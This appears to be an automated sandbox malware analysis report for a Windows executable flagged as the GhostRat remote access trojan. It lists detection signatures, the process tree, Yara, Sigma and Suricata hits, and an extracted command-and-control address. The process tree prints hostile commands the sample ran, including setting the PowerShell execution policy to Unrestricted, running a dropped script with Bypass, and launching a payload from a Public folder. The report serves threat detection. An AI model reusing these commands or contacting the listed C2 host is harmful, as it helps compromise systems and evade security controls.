Edit tour

Windows Analysis Report
Uulw5M1DfU.exe

Overview

General Information

Sample name:	Uulw5M1DfU.exe renamed because original name is a hash value
Original sample name:	F889FE126788FFBAFC2E0CD5E233FEE9.exe
Analysis ID:	1584172
MD5:	f889fe126788ffbafc2e0cd5e233fee9
SHA1:	30e1effa7018af4275713a9bb4e653455d31f93f
SHA256:	0dbb48aad54c1f2361dbc58d9f22748df9156d8709554ad20f843811657c26d4
Tags:	exeValleyRATuser-abuse_ch
Infos:

Detection

GhostRat

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected GhostRat

AI detected suspicious sample

Bypasses PowerShell execution policy

C2 URLs / IPs found in malware configuration

Connects to many ports of the same IP (likely port scanning)

Contains functionality to capture and log keystrokes

Contains functionality to inject code into remote processes

Contains functionality to inject threads in other processes

Loading BitLocker PowerShell Module

Sigma detected: Execution from Suspicious Folder

Sigma detected: Parent in Public Folder Suspicious Process

Sigma detected: Suspicious Program Location with Network Connections

AV process strings found (often used to terminate AV products)

Checks for available system drives (often done to infect USB drives)

Contains functionality for read data from the clipboard

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to clear windows event logs (to hide its activities)

Contains functionality to create guard pages, often used to hinder reverse engineering and debugging

Contains functionality to dynamically determine API calls

Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to record screenshots

Contains functionality to shutdown / reboot the system

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a DirectInput object (often for capturing keystrokes)

Creates a process in suspended mode (likely to inject code)

Detected TCP or UDP traffic on non-standard ports

Detected non-DNS traffic on DNS port

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found potential string decryption / allocating functions

Installs a global mouse hook

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE / OLE file has an invalid certificate

PE file contains executable resources (Code or Archives)

PE file contains sections with non-standard names

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Change PowerShell Policies to an Insecure Level

Sleep loop found (likely to delay execution)

Stores large binary data to the registry

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

Uulw5M1DfU.exe (PID: 7028 cmdline: "C:\Users\user\Desktop\Uulw5M1DfU.exe" MD5: F889FE126788FFBAFC2E0CD5E233FEE9)

cmd.exe (PID: 2140 cmdline: "C:\Windows\System32\cmd.exe" /c start C:\Users\Public\Bilite\Axialis\Update.exe MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 2200 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

Update.exe (PID: 4348 cmdline: C:\Users\Public\Bilite\Axialis\Update.exe MD5: FB325C945A08D06FE91681179BDCCC66)

cmd.exe (PID: 1148 cmdline: cmd.exe /B /c "C:\Users\user\AppData\Local\Temp\\monitor.bat" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 5660 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tasklist.exe (PID: 6272 cmdline: tasklist /FI "IMAGENAME eq Update.exe" MD5: 0A4448B31CE7F83CB7691A2657F330F1)

findstr.exe (PID: 2212 cmdline: findstr /I "Update.exe" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)

timeout.exe (PID: 1272 cmdline: timeout /t 30 /nobreak MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)

tasklist.exe (PID: 1072 cmdline: tasklist /FI "IMAGENAME eq Update.exe" MD5: 0A4448B31CE7F83CB7691A2657F330F1)

findstr.exe (PID: 3756 cmdline: findstr /I "Update.exe" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)

timeout.exe (PID: 5688 cmdline: timeout /t 30 /nobreak MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)

tasklist.exe (PID: 6972 cmdline: tasklist /FI "IMAGENAME eq Update.exe" MD5: 0A4448B31CE7F83CB7691A2657F330F1)

findstr.exe (PID: 2160 cmdline: findstr /I "Update.exe" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)

timeout.exe (PID: 2936 cmdline: timeout /t 30 /nobreak MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)

tasklist.exe (PID: 6512 cmdline: tasklist /FI "IMAGENAME eq Update.exe" MD5: 0A4448B31CE7F83CB7691A2657F330F1)

findstr.exe (PID: 6524 cmdline: findstr /I "Update.exe" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)

timeout.exe (PID: 6516 cmdline: timeout /t 30 /nobreak MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)

cmd.exe (PID: 932 cmdline: cmd.exe /C powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 5808 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 1836 cmdline: powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

cmd.exe (PID: 4548 cmdline: cmd.exe /C powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\updated.ps1 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 7064 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 4076 cmdline: powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\updated.ps1 MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

cleanup

Malware Configuration

Threatname: GhostRat

{"C2 url": ["137.220.229.61:9091", "137.220.229.61:9092"]}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000003.00000003.3003485617.0000000004821000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_GhostRat	Yara detected GhostRat	Joe Security
00000003.00000002.3510627044.0000000003670000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_GhostRat	Yara detected GhostRat	Joe Security
00000003.00000003.2842291150.0000000004821000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_GhostRat	Yara detected GhostRat	Joe Security
00000003.00000003.3490479814.0000000004821000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_GhostRat	Yara detected GhostRat	Joe Security
00000003.00000003.2679063829.0000000004821000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_GhostRat	Yara detected GhostRat	Joe Security
00000003.00000003.3003550749.0000000004821000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_GhostRat	Yara detected GhostRat	Joe Security
00000003.00000003.3334123549.0000000004821000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_GhostRat	Yara detected GhostRat	Joe Security
00000003.00000003.3490537983.0000000004821000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_GhostRat	Yara detected GhostRat	Joe Security
00000003.00000003.2556030347.00000000008F6000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_GhostRat	Yara detected GhostRat	Joe Security
00000003.00000003.3166004269.0000000004821000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_GhostRat	Yara detected GhostRat	Joe Security
00000003.00000003.2679005729.0000000004821000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_GhostRat	Yara detected GhostRat	Joe Security
00000003.00000002.3510757808.00000000037F0000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_GhostRat	Yara detected GhostRat	Joe Security
00000003.00000002.3510572930.00000000035B0000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_GhostRat	Yara detected GhostRat	Joe Security
00000003.00000003.2841813776.0000000004821000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_GhostRat	Yara detected GhostRat	Joe Security
00000003.00000003.2679005729.00000000047BD000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_GhostRat	Yara detected GhostRat	Joe Security
00000003.00000002.3511507592.0000000004821000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_GhostRat	Yara detected GhostRat	Joe Security
00000003.00000003.3334066140.0000000004821000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_GhostRat	Yara detected GhostRat	Joe Security
00000003.00000002.3510434362.00000000032E0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_GhostRat	Yara detected GhostRat	Joe Security
00000003.00000003.3165948702.0000000004821000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_GhostRat	Yara detected GhostRat	Joe Security
Process Memory Space: Update.exe PID: 4348	JoeSecurity_GhostRat	Yara detected GhostRat	Joe Security
Click to see the 15 entries

Unpacked PEs

Source	Rule	Description	Author
3.3.Update.exe.482260b.14.unpack	JoeSecurity_GhostRat	Yara detected GhostRat	Joe Security
3.3.Update.exe.482260b.14.raw.unpack	JoeSecurity_GhostRat	Yara detected GhostRat	Joe Security
3.3.Update.exe.482260b.5.unpack	JoeSecurity_GhostRat	Yara detected GhostRat	Joe Security
3.3.Update.exe.482260b.12.unpack	JoeSecurity_GhostRat	Yara detected GhostRat	Joe Security
3.2.Update.exe.36705bf.6.unpack	JoeSecurity_GhostRat	Yara detected GhostRat	Joe Security
3.3.Update.exe.482260b.6.unpack	JoeSecurity_GhostRat	Yara detected GhostRat	Joe Security
3.2.Update.exe.37f0000.7.raw.unpack	JoeSecurity_GhostRat	Yara detected GhostRat	Joe Security
3.2.Update.exe.482260b.8.raw.unpack	JoeSecurity_GhostRat	Yara detected GhostRat	Joe Security
3.3.Update.exe.482260b.1.unpack	JoeSecurity_GhostRat	Yara detected GhostRat	Joe Security
3.3.Update.exe.482260b.2.unpack	JoeSecurity_GhostRat	Yara detected GhostRat	Joe Security
3.2.Update.exe.482260b.8.unpack	JoeSecurity_GhostRat	Yara detected GhostRat	Joe Security
3.3.Update.exe.92667b.0.raw.unpack	JoeSecurity_GhostRat	Yara detected GhostRat	Joe Security
3.3.Update.exe.482260b.5.raw.unpack	JoeSecurity_GhostRat	Yara detected GhostRat	Joe Security
3.3.Update.exe.482260b.8.unpack	JoeSecurity_GhostRat	Yara detected GhostRat	Joe Security
3.3.Update.exe.482260b.11.unpack	JoeSecurity_GhostRat	Yara detected GhostRat	Joe Security
3.3.Update.exe.482260b.11.raw.unpack	JoeSecurity_GhostRat	Yara detected GhostRat	Joe Security
3.3.Update.exe.482260b.13.raw.unpack	JoeSecurity_GhostRat	Yara detected GhostRat	Joe Security
3.3.Update.exe.482260b.10.raw.unpack	JoeSecurity_GhostRat	Yara detected GhostRat	Joe Security
3.3.Update.exe.482260b.9.raw.unpack	JoeSecurity_GhostRat	Yara detected GhostRat	Joe Security
3.3.Update.exe.482260b.13.unpack	JoeSecurity_GhostRat	Yara detected GhostRat	Joe Security
3.3.Update.exe.482260b.7.unpack	JoeSecurity_GhostRat	Yara detected GhostRat	Joe Security
3.3.Update.exe.482260b.10.unpack	JoeSecurity_GhostRat	Yara detected GhostRat	Joe Security
3.2.Update.exe.37f0000.7.unpack	JoeSecurity_GhostRat	Yara detected GhostRat	Joe Security
3.3.Update.exe.482260b.6.raw.unpack	JoeSecurity_GhostRat	Yara detected GhostRat	Joe Security
3.2.Update.exe.35b1053.5.raw.unpack	JoeSecurity_GhostRat	Yara detected GhostRat	Joe Security
3.3.Update.exe.482260b.1.raw.unpack	JoeSecurity_GhostRat	Yara detected GhostRat	Joe Security
3.2.Update.exe.36705bf.6.raw.unpack	JoeSecurity_GhostRat	Yara detected GhostRat	Joe Security
3.3.Update.exe.482260b.12.raw.unpack	JoeSecurity_GhostRat	Yara detected GhostRat	Joe Security
3.3.Update.exe.482260b.9.unpack	JoeSecurity_GhostRat	Yara detected GhostRat	Joe Security
3.3.Update.exe.92667b.0.unpack	JoeSecurity_GhostRat	Yara detected GhostRat	Joe Security
3.2.Update.exe.32e1004.4.unpack	JoeSecurity_GhostRat	Yara detected GhostRat	Joe Security
3.2.Update.exe.32e1004.4.raw.unpack	JoeSecurity_GhostRat	Yara detected GhostRat	Joe Security
3.3.Update.exe.482260b.2.raw.unpack	JoeSecurity_GhostRat	Yara detected GhostRat	Joe Security
3.3.Update.exe.482260b.7.raw.unpack	JoeSecurity_GhostRat	Yara detected GhostRat	Joe Security
3.2.Update.exe.35b1053.5.unpack	JoeSecurity_GhostRat	Yara detected GhostRat	Joe Security
3.3.Update.exe.482260b.8.raw.unpack	JoeSecurity_GhostRat	Yara detected GhostRat	Joe Security
Click to see the 31 entries

Sigma Signatures

System Summary

Sigma detected: Execution from Suspicious Folder

Source: Process started

Author: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: C:\Users\Public\Bilite\Axialis\Update.exe, CommandLine: C:\Users\Public\Bilite\Axialis\Update.exe, CommandLine|base64offset|contains: , Image: C:\Users\Public\Bilite\Axialis\Update.exe, NewProcessName: C:\Users\Public\Bilite\Axialis\Update.exe, OriginalFileName: C:\Users\Public\Bilite\Axialis\Update.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c start C:\Users\Public\Bilite\Axialis\Update.exe, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 2140, ParentProcessName: cmd.exe, ProcessCommandLine: C:\Users\Public\Bilite\Axialis\Update.exe, ProcessId: 4348, ProcessName: Update.exe

Sigma detected: Parent in Public Folder Suspicious Process

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: cmd.exe /C powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser", CommandLine: cmd.exe /C powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: C:\Users\Public\Bilite\Axialis\Update.exe, ParentImage: C:\Users\Public\Bilite\Axialis\Update.exe, ParentProcessId: 4348, ParentProcessName: Update.exe, ProcessCommandLine: cmd.exe /C powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser", ProcessId: 932, ProcessName: cmd.exe

Sigma detected: Suspicious Program Location with Network Connections

Source: Network Connection

Author: Florian Roth (Nextron Systems), Tim Shelton: Data: DestinationIp: 137.220.229.61, DestinationIsIpv6: false, DestinationPort: 18852, EventID: 3, Image: C:\Users\Public\Bilite\Axialis\Update.exe, Initiated: true, ProcessId: 4348, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 53790

Sigma detected: Change PowerShell Policies to an Insecure Level

Source: Process started

Author: frack113: Data: Command: powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser", CommandLine: powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: cmd.exe /C powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 932, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser", ProcessId: 1836, ProcessName: powershell.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser", CommandLine: powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: cmd.exe /C powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 932, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser", ProcessId: 1836, ProcessName: powershell.exe

Suricata Signatures

ET MALWARE Anonymous RAT CnC Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-04T14:48:52.519499+0100	2052875	1	A Network Trojan was detected	192.168.2.4	53816	137.220.229.61	9091	TCP
2025-01-04T14:50:00.195548+0100	2052875	1	A Network Trojan was detected	192.168.2.4	53836	137.220.229.61	9091	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: Update.exe.4348.3.memstrmin

Malware Configuration Extractor: GhostRat {"C2 url": ["137.220.229.61:9091", "137.220.229.61:9092"]}

Multi AV Scanner detection for dropped file

Source: C:\Users\Public\Bilite\Axialis\Update.dll	ReversingLabs: Detection: 60%
Source: C:\Users\user\AppData\Local\Temp\backup.dll	ReversingLabs: Detection: 60%

Multi AV Scanner detection for submitted file

Source: Uulw5M1DfU.exe

ReversingLabs: Detection: 47%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 95.4% probability

Source: C:\Users\Public\Bilite\Axialis\Update.exe	Code function: 3_2_6CA86EB0 CryptAcquireContextW,CryptImportKey,CryptSetKeyParam,CryptSetKeyParam,CryptDecrypt,CryptDestroyKey,CryptReleaseContext,___std_exception_copy,CryptReleaseContext,___std_exception_copy,CryptDestroyKey,CryptReleaseContext,___std_exception_copy,CryptDestroyKey,CryptReleaseContext,___std_exception_copy,___std_exception_copy,	3_2_6CA86EB0
Source: C:\Users\Public\Bilite\Axialis\Update.exe	Code function: 3_2_6CA86720 CryptAcquireContextW,CryptCreateHash,CryptHashData,CryptHashData,CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,CryptReleaseContext,___std_exception_copy,CryptDestroyHash,CryptReleaseContext,___std_exception_copy,CryptDestroyHash,CryptReleaseContext,___std_exception_copy,CryptReleaseContext,___std_exception_copy,CryptDestroyHash,CryptReleaseContext,___std_exception_copy,___std_exception_copy,	3_2_6CA86720
Source: C:\Users\Public\Bilite\Axialis\Update.exe	Code function: 3_2_6CA86520 CryptStringToBinaryA,CryptStringToBinaryA,___std_exception_copy,	3_2_6CA86520

Source: Uulw5M1DfU.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source:	Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb9 source: powershell.exe, 00000012.00000002.2573546092.0000000008838000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: H:\trunk_download\downloader_cn\downloader\bin\ldplayerinst.pdb source: Uulw5M1DfU.exe, 00000000.00000003.1743133321.0000000002B87000.00000004.00000020.00020000.00000000.sdmp, ldplayer9_ld_6000_ld.exe.0.dr
Source:	Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000012.00000002.2573546092.0000000008838000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\Administrator\Desktop\MFCLibrary_YSS\Release\Update.pdb source: Uulw5M1DfU.exe, 00000000.00000003.1743133321.0000000002AF6000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000003.00000002.3511704296.000000006CABD000.00000002.00000001.01000000.00000006.sdmp
Source:	Binary string: E:\agent\workspace\p-e3cf6c00cb1d4f41832c02872427999a\src\Ufo4WinMac\GamerUFO\ufo4Desktop\Output\bin\Release\UpdateApp.pdb source: Uulw5M1DfU.exe, 00000000.00000003.1743133321.0000000002AF6000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000003.00000002.3509363216.00000000006E2000.00000002.00000001.01000000.00000005.sdmp, Update.exe, 00000003.00000000.1746874301.00000000006E2000.00000002.00000001.01000000.00000005.sdmp, Update.exe.0.dr
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb_qF source: powershell.exe, 00000012.00000002.2569455874.000000000776B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000012.00000002.2561569868.0000000002FAB000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\System.Management.Automation.pdbpdbion.pdb source: powershell.exe, 00000012.00000002.2573546092.0000000008838000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000012.00000002.2569455874.000000000776B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: E:\agent\workspace\p-e3cf6c00cb1d4f41832c02872427999a\src\Ufo4WinMac\GamerUFO\ufo4Desktop\Output\bin\Release\UpdateApp.pdb((& source: Uulw5M1DfU.exe, 00000000.00000003.1743133321.0000000002AF6000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000003.00000002.3509363216.00000000006E2000.00000002.00000001.01000000.00000005.sdmp, Update.exe, 00000003.00000000.1746874301.00000000006E2000.00000002.00000001.01000000.00000005.sdmp, Update.exe.0.dr
Source:	Binary string: H:\trunk_download\downloader_cn\downloader\bin\ldplayerinst.pdbo source: Uulw5M1DfU.exe, 00000000.00000003.1743133321.0000000002B87000.00000004.00000020.00020000.00000000.sdmp, ldplayer9_ld_6000_ld.exe.0.dr

Source: C:\Users\Public\Bilite\Axialis\Update.exe	File opened: z:	Jump to behavior
Source: C:\Users\Public\Bilite\Axialis\Update.exe	File opened: x:	Jump to behavior
Source: C:\Users\Public\Bilite\Axialis\Update.exe	File opened: v:	Jump to behavior
Source: C:\Users\Public\Bilite\Axialis\Update.exe	File opened: t:	Jump to behavior
Source: C:\Users\Public\Bilite\Axialis\Update.exe	File opened: r:	Jump to behavior
Source: C:\Users\Public\Bilite\Axialis\Update.exe	File opened: p:	Jump to behavior
Source: C:\Users\Public\Bilite\Axialis\Update.exe	File opened: n:	Jump to behavior
Source: C:\Users\Public\Bilite\Axialis\Update.exe	File opened: l:	Jump to behavior
Source: C:\Users\Public\Bilite\Axialis\Update.exe	File opened: j:	Jump to behavior
Source: C:\Users\Public\Bilite\Axialis\Update.exe	File opened: h:	Jump to behavior
Source: C:\Users\Public\Bilite\Axialis\Update.exe	File opened: f:	Jump to behavior
Source: C:\Users\Public\Bilite\Axialis\Update.exe	File opened: b:	Jump to behavior
Source: C:\Users\Public\Bilite\Axialis\Update.exe	File opened: y:	Jump to behavior
Source: C:\Users\Public\Bilite\Axialis\Update.exe	File opened: w:	Jump to behavior
Source: C:\Users\Public\Bilite\Axialis\Update.exe	File opened: u:	Jump to behavior
Source: C:\Users\Public\Bilite\Axialis\Update.exe	File opened: s:	Jump to behavior
Source: C:\Users\Public\Bilite\Axialis\Update.exe	File opened: q:	Jump to behavior
Source: C:\Users\Public\Bilite\Axialis\Update.exe	File opened: o:	Jump to behavior
Source: C:\Users\Public\Bilite\Axialis\Update.exe	File opened: m:	Jump to behavior
Source: C:\Users\Public\Bilite\Axialis\Update.exe	File opened: k:	Jump to behavior
Source: C:\Users\Public\Bilite\Axialis\Update.exe	File opened: i:	Jump to behavior
Source: C:\Users\Public\Bilite\Axialis\Update.exe	File opened: g:	Jump to behavior
Source: C:\Users\Public\Bilite\Axialis\Update.exe	File opened: e:	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: c:	Jump to behavior
Source: C:\Users\Public\Bilite\Axialis\Update.exe	File opened: [:	Jump to behavior

Source: C:\Users\user\Desktop\Uulw5M1DfU.exe	Code function: 0_2_0040301A GetFileAttributesW,SetLastError,FindFirstFileW,FindClose,CompareFileTime,	0_2_0040301A
Source: C:\Users\user\Desktop\Uulw5M1DfU.exe	Code function: 0_2_00402B79 FindFirstFileW,SetFileAttributesW,lstrcmpW,lstrcmpW,SetFileAttributesW,DeleteFileW,FindNextFileW,FindClose,SetFileAttributesW,RemoveDirectoryW,??3@YAXPAX@Z,??3@YAXPAX@Z,	0_2_00402B79
Source: C:\Users\Public\Bilite\Axialis\Update.exe	Code function: 3_2_6CAAF888 FindFirstFileExW,RevokeDragDrop,FindNextFileW,FindClose,FindClose,	3_2_6CAAF888
Source: C:\Users\Public\Bilite\Axialis\Update.exe	Code function: 3_2_6CAAF7D7 FindFirstFileExW,	3_2_6CAAF7D7

Source: C:\Users\Public\Bilite\Axialis\Update.exe

Code function: 3_2_037F80F0 wsprintfW,GetLogicalDriveStringsW,lstrcmpiW,lstrcmpiW,QueryDosDeviceW,lstrlenW,__wcsnicmp,lstrcpyW,lstrcpyW,lstrcatW,

3_2_037F80F0

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2052875 - Severity 1 - ET MALWARE Anonymous RAT CnC Checkin : 192.168.2.4:53816 -> 137.220.229.61:9091
Source: Network traffic	Suricata IDS: 2052875 - Severity 1 - ET MALWARE Anonymous RAT CnC Checkin : 192.168.2.4:53836 -> 137.220.229.61:9091

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: 137.220.229.61:9091
Source: Malware configuration extractor	URLs: 137.220.229.61:9092

Connects to many ports of the same IP (likely port scanning)

Source: global traffic

TCP traffic: 137.220.229.61 ports 18852,1,2,5,9091,8

Source: global traffic

TCP traffic: 192.168.2.4:53790 -> 137.220.229.61:18852

Source: global traffic

TCP traffic: 192.168.2.4:53672 -> 1.1.1.1:53

Source: Joe Sandbox View

ASN Name: BCPL-SGBGPNETGlobalASNSG BCPL-SGBGPNETGlobalASNSG

Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 137.220.229.61
Source: unknown	TCP traffic detected without corresponding DNS query: 137.220.229.61
Source: unknown	TCP traffic detected without corresponding DNS query: 137.220.229.61
Source: unknown	TCP traffic detected without corresponding DNS query: 137.220.229.61
Source: unknown	TCP traffic detected without corresponding DNS query: 137.220.229.61
Source: unknown	TCP traffic detected without corresponding DNS query: 137.220.229.61
Source: unknown	TCP traffic detected without corresponding DNS query: 137.220.229.61
Source: unknown	TCP traffic detected without corresponding DNS query: 137.220.229.61
Source: unknown	TCP traffic detected without corresponding DNS query: 137.220.229.61
Source: unknown	TCP traffic detected without corresponding DNS query: 137.220.229.61
Source: unknown	TCP traffic detected without corresponding DNS query: 137.220.229.61
Source: unknown	TCP traffic detected without corresponding DNS query: 137.220.229.61
Source: unknown	TCP traffic detected without corresponding DNS query: 137.220.229.61
Source: unknown	TCP traffic detected without corresponding DNS query: 137.220.229.61
Source: unknown	TCP traffic detected without corresponding DNS query: 137.220.229.61
Source: unknown	TCP traffic detected without corresponding DNS query: 137.220.229.61
Source: unknown	TCP traffic detected without corresponding DNS query: 137.220.229.61
Source: unknown	TCP traffic detected without corresponding DNS query: 137.220.229.61
Source: unknown	TCP traffic detected without corresponding DNS query: 137.220.229.61
Source: unknown	TCP traffic detected without corresponding DNS query: 137.220.229.61
Source: unknown	TCP traffic detected without corresponding DNS query: 137.220.229.61
Source: unknown	TCP traffic detected without corresponding DNS query: 137.220.229.61
Source: unknown	TCP traffic detected without corresponding DNS query: 137.220.229.61
Source: unknown	TCP traffic detected without corresponding DNS query: 137.220.229.61
Source: unknown	TCP traffic detected without corresponding DNS query: 137.220.229.61
Source: unknown	TCP traffic detected without corresponding DNS query: 137.220.229.61
Source: unknown	TCP traffic detected without corresponding DNS query: 137.220.229.61
Source: unknown	TCP traffic detected without corresponding DNS query: 137.220.229.61
Source: unknown	TCP traffic detected without corresponding DNS query: 137.220.229.61
Source: unknown	TCP traffic detected without corresponding DNS query: 137.220.229.61
Source: unknown	TCP traffic detected without corresponding DNS query: 137.220.229.61
Source: unknown	TCP traffic detected without corresponding DNS query: 137.220.229.61
Source: unknown	TCP traffic detected without corresponding DNS query: 137.220.229.61
Source: unknown	TCP traffic detected without corresponding DNS query: 137.220.229.61
Source: unknown	TCP traffic detected without corresponding DNS query: 137.220.229.61
Source: unknown	TCP traffic detected without corresponding DNS query: 137.220.229.61
Source: unknown	TCP traffic detected without corresponding DNS query: 137.220.229.61
Source: unknown	TCP traffic detected without corresponding DNS query: 137.220.229.61
Source: unknown	TCP traffic detected without corresponding DNS query: 137.220.229.61
Source: unknown	TCP traffic detected without corresponding DNS query: 137.220.229.61
Source: unknown	TCP traffic detected without corresponding DNS query: 137.220.229.61
Source: unknown	TCP traffic detected without corresponding DNS query: 137.220.229.61
Source: unknown	TCP traffic detected without corresponding DNS query: 137.220.229.61
